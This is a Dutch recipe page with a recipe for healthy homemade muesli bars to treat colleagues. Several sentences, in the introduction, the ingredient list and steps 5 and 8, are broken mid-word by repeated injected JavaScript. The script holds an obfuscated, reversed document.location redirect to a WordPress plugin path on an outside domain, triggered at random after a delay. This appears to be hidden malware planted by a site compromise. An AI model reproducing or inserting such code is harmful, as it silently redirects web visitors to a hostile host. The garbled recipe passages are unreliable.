Gezonde traktaties maart

Ook deze maand kun je met deze heerlijke traktatie jouw collega’s verrassen.

Mueslirepen uit eigen oven

Heb jij ook zo’n gezellige afdeling met heel veel collega’s? Deze zelfgemaakte mueslirepen zijn ook in grote hoeveelheden ontzettend makkelijk te maken én te bewaren. Dit jaar hoef je niet de koelkast te vullen met grote taartdozen. De mueslirepen bevatten geen toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toegevoegde suiker, weinig vet en zijn een goede bron van vezels omdat je volkorenmeel en gedroogd fruit gebruikt.

Ingrediënten voor 10 repen

Gezonde traktaties op het werk: mueslireep uit eigen oven - Enerjoy

  • 120 gram volkorenmeel
  • 70 gram muesli
  • 20 gram rozijnen
  • 2 eieren
  • drie eetlepels water
  • 30 gram noten
  • 1 ruime eetlepel peren-appelstroop (zonder toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toegevoegd suiker)

Voedingswaarden per reep

Energie: 113 kcal
Eiwit: 4 gram
Koolhydraten: 15 gram
Vet: 4 gram

Bereiding (45 minuten)

  1. Weeg alle ingrediënten af en zet ze klaar in kommetjes;
  2. Verwarm de oven op 200° C;
  3. Hak de noten en eventueel het gedroogde fruit grof;
  4. Meng in een beslagkom alle ingrediënten en roer het goed door met een lepel;
  5. Het beslag moet een licht plakkerigere structuur hebben. Voeg extra volkorenmeel toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe, als het te plakkerig is of juist water als je hem nog te droog vindt;
  6. Neem een diepe bakplaat en bekleed deze met bakpapier, of gebruik een siliconen vorm;
  7. Verdeel het beslag over de bakplaat en strijk deze glad;
  8. Plaats het bakblik in de voorverwarmde oven en bak het geheel in ongeveer 20 minuten toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot deze goudbruin is;
  9. Laat het voorzichtig even afkoelen;
  10. Snijd de koek in 10 repen, als deze nog warm en zacht is;
  11. Laat de repen vervolgens helemaal afkoelen en bewaar ze in een afsluitbare trommel.

Variatie

Maak een assorti aan mueslirepen en varieer met bijvoorbeeld sesamzaad, kokos, gepofte rijst, gedroogde vijgen, abrikozen, dadels, cranberry’s of breng het op smaak met kaneel. Je kan natuurlijk ook de reep aan beide kanten in extra pure chocolade dopen, net als bij een bokkenpootje.
Bron recept: www.smulweb.nl